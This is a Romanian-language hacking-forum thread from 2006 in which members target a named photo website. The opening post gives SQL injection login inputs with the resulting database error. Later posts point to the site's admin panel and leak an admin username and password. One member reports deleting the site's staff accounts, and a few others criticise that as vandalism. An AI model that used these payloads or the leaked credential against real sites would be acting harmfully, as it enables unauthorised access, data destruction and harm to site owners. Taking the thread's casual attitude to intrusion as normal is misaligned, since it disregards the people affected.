escalation666 Posted December 10, 2006 Report Share Posted December 10, 2006 http://www.fotoshop.ro that's the targetWhy? pt ca face spamVulnerabilitate:sql injection Poc: user:admin'--Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_groupMySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)Am o lene prea mare zilele astea ca sa incerc sa aflu parola de admin.De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta. Quote Link to comment Share on other sites More sharing options...
lordping Posted December 10, 2006 Report Share Posted December 10, 2006 http://www.fotoshop.ro/admin + datele de mai sus ... => acces la parola adminului si altele Quote Link to comment Share on other sites More sharing options...
J0K3R Posted December 10, 2006 Report Share Posted December 10, 2006 escalation666 wrote: De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.Asta e un SQL Injection ? :? Quote Link to comment Share on other sites More sharing options...
Guest flama Posted December 10, 2006 Report Share Posted December 10, 2006 user: kadajpass: sugipulascuzatzi parola asta in caz ca nu va mai merge sql injectul Quote Link to comment Share on other sites More sharing options...
Crhistmas Posted December 10, 2006 Report Share Posted December 10, 2006 Io stiam ca iei sursa codului scoti java din el astfel incat sa vezi la pass ce scrii si pui ceva de genu " * or 1+1 -- " si la user ce vrei...tu...nush daca e corect...daca nu sa ma corectati Oricum multam Quote Link to comment Share on other sites More sharing options...
escalation666 Posted December 10, 2006 Author Report Share Posted December 10, 2006 gg flama!christmas...se poate si asa...probabil ai vazut chestia asta dintr-un tutorial video e util sa faci asta cand la username trebuie sa pui o adresa de email...si javascriptul nu te lasa sa pui ceva de genu [mail]dfdf@fdwfdw.com[/mail] Quote Link to comment Share on other sites More sharing options...
Crhistmas Posted December 10, 2006 Report Share Posted December 10, 2006 Aham multumesc dar exista vreun program care face munca mai usoara ? Quote Link to comment Share on other sites More sharing options...
Ras Posted December 10, 2006 Report Share Posted December 10, 2006 tu vrei sa fie un buton pe care sa apesi si gata site-ul sa fie al tau ?? :@ :@ Quote Link to comment Share on other sites More sharing options...
devianc3 Posted December 10, 2006 Report Share Posted December 10, 2006 zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? gen.. change username? Quote Link to comment Share on other sites More sharing options...
greeny Posted December 10, 2006 Report Share Posted December 10, 2006 devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? gen.. change username? Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@ Quote Link to comment Share on other sites More sharing options...
impure Posted December 10, 2006 Report Share Posted December 10, 2006 sa vad si eu cei pe situ ala sa vad care este treba Quote Link to comment Share on other sites More sharing options...
Guest flama Posted December 11, 2006 Report Share Posted December 11, 2006 greeny wrote: devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? gen.. change username? Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@offf numai pe distrugeri suntetzi pushi mai copii Quote Link to comment Share on other sites More sharing options...
Sad_Dreamer Posted December 11, 2006 Report Share Posted December 11, 2006 ce lame...dupa ce ca au primit parola mura-n gura mai si sterg tot..pff..fking kids daca eram in locul lui spiry ii dadeam ban aluia...aia sunt parteneri cu share.urbanfriends.us Quote Link to comment Share on other sites More sharing options...
thelegend Posted December 11, 2006 Report Share Posted December 11, 2006 misto treaba. c my faci tov sad dreamer? ma mai tzii minte? bafta Quote Link to comment Share on other sites More sharing options...
4n4rchyl04d3r Posted December 17, 2006 Report Share Posted December 17, 2006 ...winers dont use copys.... Quote Link to comment Share on other sites More sharing options...